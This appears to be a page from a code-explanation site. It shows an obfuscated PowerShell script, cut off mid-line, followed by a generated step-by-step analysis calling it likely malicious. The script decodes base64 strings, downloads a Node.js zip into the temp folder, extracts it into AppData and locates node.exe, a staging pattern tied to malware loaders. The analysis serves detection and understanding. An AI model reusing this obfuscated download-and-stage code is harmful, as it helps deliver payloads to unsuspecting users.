This script appears to be malicious, and it performs the...

April 3, 2025 at 10:42 PM

${01000010011111101} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcABzADoALwAvAG4AbwBkAGUAagBzAC4AbwByAGcALwBkAGkAcwB0AC8AdgAyADIALgAxADEALgAwAC8AbgBvAGQAZQAtAHYAMgAyAC4AMQAxAC4AMAAtAHcAaQBuAC0AeAA2ADQALgB6AGkAcAA=')))
${10001010001010001} = [System.IO.Path]::Combine($env:appdata, "")
${10100111010011111} = [System.IO.Path]::Combine($env:tmp, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZABvAHcAbgBsAG8AYQBkAGUAZAAuAHoAaQBwAA=='))))
iwr -uri ${01000010011111101} -o ${10100111010011111}
sleep $(0.5 + 0.5)
try {
    ${01010111101011000} = New-Object -ComObject Shell.Application
    ${00011001110110110} = ${01010111101011000}.NameSpace(${10100111010011111})
    ${00011001010101100} = ${01010111101011000}.NameSpace(${10001010001010001})
    ${00011001010101100}.CopyHere(${00011001110110110}.Items(), 4 + 16)
} catch {
    exit 0
}
${10001010001010001} = [System.IO.Path]::Combine(${10001010001010001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBvAGQAZQAtAHYAMgAyAC4AMQAxAC4AMAAtAHcAaQBuAC0AeAA2ADQA'))))
${01110010000110110} = [System.IO.Path]::Combine(${10001010001010001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBvAGQAZQAuAGUAeABlAA=='))))
${00010011001100110} =

This script appears to be malicious, and it performs the following operations step by step:

Extracts a URL using Base64 decoding: The following Base64 string is decoded:

aAB0AHQAcABzADoALwAvAG4AbwBkAGUAagBzAC4AbwByAGcALwBkAGkAcwB0AC8AdgAyADIALgAxADEALgAwAC8AbgBvAGQAZQAtAHYAMgAyAC4AMQAxAC4AMAAtAHcAaQBuAC0AeAA2ADQALgB6AGkAcAA=

This translates to:

https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip

This URL specifies a link to a .zip file containing a version of Node.js.

Derives file paths: The script sets up two file path variables:
- ${10001010001010001} points to a directory inside the user's AppData directory.
- ${10100111010011111} points to a .zip file within the user's temporary folder (%temp%). This .zip file will be named downloaded.zip.
Downloads the file: Using iwr (PowerShell command for Invoke-WebRequest), the script downloads the file from the URL (${01000010011111101}) and saves it to the path specified by ${10100111010011111}.
Waits briefly (sleep): The script waits for approximately 1 second so that the download operation has time to complete.
Extracts the contents of the ZIP file:
- The script uses the Shell.Application COM object to extract the .zip file.
- It opens the downloaded .zip (${10100111010011111}) and extracts its contents to the directory specified by ${10001010001010001}.
Modifies further paths:
- Creates another path to node-v22.11.0-win-x64, a directory resulting from the ZIP's extraction.
- Then it specifies another file path to node.exe, the executable for Node.js.
Malicious intent (likely):
- Based on the behavior, the script appears to prepare or extract a malicious Node.js environment under the user's AppData directory. It may then be used for executing further malicious payloads or scripts.
Incomplete code at the end: The script seems to stop abruptly, as the final variable assignment is incomplete (${00010011001100110} =), so it's unclear if there's more code following.

Conclusion: The script downloads a ZIP file, extracts its content, and points to an executable (node.exe). This type of pattern is often associated with setup steps for executing malicious payloads using legitimate tools (in this case, Node.js). It is highly recommended to avoid executing such scripts without verifying their origin and purpose.

Generate your own explanations

Download our vscode extension

Read other generated explanations

Built by @thebuilderjr